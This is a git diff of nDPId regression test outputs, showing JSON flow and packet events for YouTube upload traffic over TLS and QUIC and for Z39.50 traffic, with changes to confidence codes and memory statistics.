-01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1511102578051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578051,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAV5AAIARbSHAqAIbrNkXb\/MYAbsFTi5hDQjRAddSQpCnUTAzOQGXrkR+sB0UFtwM1LigAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAdZgRWgAAAAA2Qv7BjobCVSSNm3vqxisDs2cBNiW7yusCpyOOCMJF82QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1511102578108,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578108,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTs8jCAjRAddSQpCnAZLrpBY0DjIhd5jwe0ABH5UBAQD\/\/\/\/1BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAOdd9OCaMJjZHEuQSnBheExXijy9L8yxcLxijUGUgt7VeQLmXHCE0dSCjTwUu4DOXBlw0HTG62CtZtu2a6Ru1X+sH1IA2FJqDRpGVA5MHyMKc7vKtJZUWy6Wq\/FvJH3N94ZirXYSBfeq9Qo8ATBGAiEAppVGAzltTsobgX744i5bBeIqIDO\/YtwFhdblUPMaf9ECIQDgN5eoKUWZEY4A\/yjD3jA5j4ZdDcRSfqhMU1oZUTGdIVNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADNfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1511102578109,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578109,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTrFpCAjRAddSQpCnArwHRDvEv6bzYWaHzaQBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","packets-captured":137,"packets-processed":137,"total-skipped-flows":0,"total-l4-payload-len":121086,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1511102594936} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 137/137 @@ -29,9 +29,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5885944 bytes -~~ total memory freed........: 5885944 bytes -~~ total allocations/frees...: 118280/118280 +~~ total memory allocated....: 6019578 bytes +~~ total memory freed........: 6019578 bytes +~~ total allocations/frees...: 121042/121042 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 2279 chars diff --git a/test/results/z3950.pcapng.out b/test/results/z3950.pcapng.out index d28350e4f..e39d6a9f4 100644 --- a/test/results/z3950.pcapng.out +++ b/test/results/z3950.pcapng.out @@ -11,8 +11,8 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} -00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} 